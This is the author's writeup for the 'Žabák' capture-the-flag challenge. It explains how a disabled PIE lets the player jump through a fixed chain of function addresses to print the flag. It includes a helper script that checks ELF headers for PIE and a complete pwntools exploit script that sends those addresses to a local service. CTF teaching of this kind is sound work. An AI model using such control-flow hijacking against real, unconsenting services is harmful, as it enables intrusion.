Žabák - Author's solution to the challenge

Challenge author: Sijisu
Writeup author: Sijisu

Solution

In a loop, the binary lets you jump to any of its functions. Because PIE is turned off, all the function addresses are known in advance. If you jump to the functions in the correct order, so that every condition is met, you can finally jump to moucha_ulovena, which prints the flag.
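The claim that every address is known in advance rests on the binary not being position independent: a non-PIE executable (ELF type ET_EXEC) is mapped at its link-time address, so the values in its symbol table are already run-time addresses, whereas a PIE (ET_DYN) is loaded at a random base and the same values are only offsets until a base has been leaked. The following Python script is an added example, not part of the original writeup or the challenge sources: it parses the ELF64 header with the standard library only (no pwntools) to decide which case applies, and computes where a symbol lands at run time. The two headers it builds in-line are constructed test data, and every address in them is a made-up value, not one from the challenge binary.

```python
import struct

# ELF64 file header (System V ABI), little-endian field order:
# e_ident[16], e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
# e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")

ET_EXEC = 2      # fixed-address executable: no PIE
ET_DYN = 3       # position-independent executable (or a shared object)
EM_X86_64 = 62   # amd64, the architecture the writeup's checksec output reports


def parse_elf64_header(data):
    """Return the header fields needed here, validating the identification bytes first."""
    if len(data) < ELF64_HEADER.size:
        raise ValueError("too short for an ELF64 header")
    fields = ELF64_HEADER.unpack_from(data)
    ident = fields[0]
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if ident[4] != 2:
        raise ValueError("only ELFCLASS64 is handled here")
    if ident[5] != 1:
        raise ValueError("only little-endian (ELFDATA2LSB) is handled here")
    return {
        "e_type": fields[1],
        "e_machine": fields[2],
        "e_entry": fields[4],
    }


def is_pie(data):
    """True when the executable is position independent.

    Caveat: ET_DYN is also the type of shared libraries, so the answer is
    only meaningful for a file already known to be an executable.
    """
    return parse_elf64_header(data)["e_type"] == ET_DYN


def runtime_address(data, symbol_value, load_base=None):
    """Where a symbol-table value ends up at run time.

    Non-PIE: the value is already the absolute address (the situation the
    writeup relies on).  PIE: the value is an offset, and a leaked load base
    is required before it can be used.
    """
    if not is_pie(data):
        return symbol_value
    if load_base is None:
        raise ValueError("PIE binary: a leaked load base is needed")
    return load_base + symbol_value


def make_header(e_type, e_entry):
    """Constructed test data: a bare amd64 ELF64 header with no program or
    section headers.  Not a header taken from the challenge binary."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9   # class64, LSB, version 1
    return ELF64_HEADER.pack(ident, e_type, EM_X86_64, 1, e_entry,
                             0, 0, 0, ELF64_HEADER.size, 56, 0, 64, 0, 0)


if __name__ == "__main__":
    no_pie = make_header(ET_EXEC, 0x401060)   # made-up entry point
    pie = make_header(ET_DYN, 0x1060)         # made-up entry point
    for name, hdr in (("fixed-address binary", no_pie), ("PIE binary", pie)):
        print(name, "->", "PIE" if is_pie(hdr) else "No PIE")
    # a hypothetical symbol at 0x401236 in the fixed-address binary: usable as-is
    print(hex(runtime_address(no_pie, 0x401236)))
    # the same symbol as an offset in a PIE: needs a base, here a made-up 0x555555554000
    print(hex(runtime_address(pie, 0x1236, load_base=0x555555554000)))
```

This is the same test behind the "PIE: No PIE (0x400000)" line that pwntools prints in the exploit template's header; 0x400000 is the conventional link-time base of non-PIE amd64 executables, which is why the symbol addresses the script reads from exe.symbols can be sent to the service without any leak.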

Exploit script

An example exploit is provided. By default it attacks localhost on port 9999; a different target can be specified with the HOST and PORT arguments, and the LOCAL argument runs the binary locally instead of connecting to a service. When attacking the binary in the Docker container, you must point the script at the correct binary with EXE=./chall.

NOTE: The exploit requires the pwntools library.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host localhost --port 9999 ../src/chall
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or '../src/chall')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or 'localhost'
port = int(args.PORT or 9999)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

# In LOCAL mode the binary is given a dummy flag through its environment;
# when connecting to the remote service this keyword is simply ignored.
io = start(env={"FLAG":"hxx{test}"})

def execute_function(func):
    '''Answer the "? " prompt with the 8-byte address of the function to jump to'''
    io.sendafter(b'? ', p64(func))

# Warm-up: 43 squats in total (42 in the loop plus one more), followed by the
# remaining preparation functions in the order the binary's checks require
for _ in range(42):
    execute_function(exe.symbols['udelat_drep'])

execute_function(exe.symbols['udelat_drep'])
execute_function(exe.symbols['opravdu_pripravit_zabu'])
execute_function(exe.symbols['protahnout_nohy'])
execute_function(exe.symbols['zahajit_utok'])
execute_function(exe.symbols['rozcvicit_jazyk'])

# The five jumps towards the fly
execute_function(exe.symbols['skok1'])
execute_function(exe.symbols['skok2'])
execute_function(exe.symbols['skok3'])
execute_function(exe.symbols['skok4'])
execute_function(exe.symbols['skok5'])

# Every condition is now met: this function prints the flag
execute_function(exe.symbols['moucha_ulovena'])

io.interactive()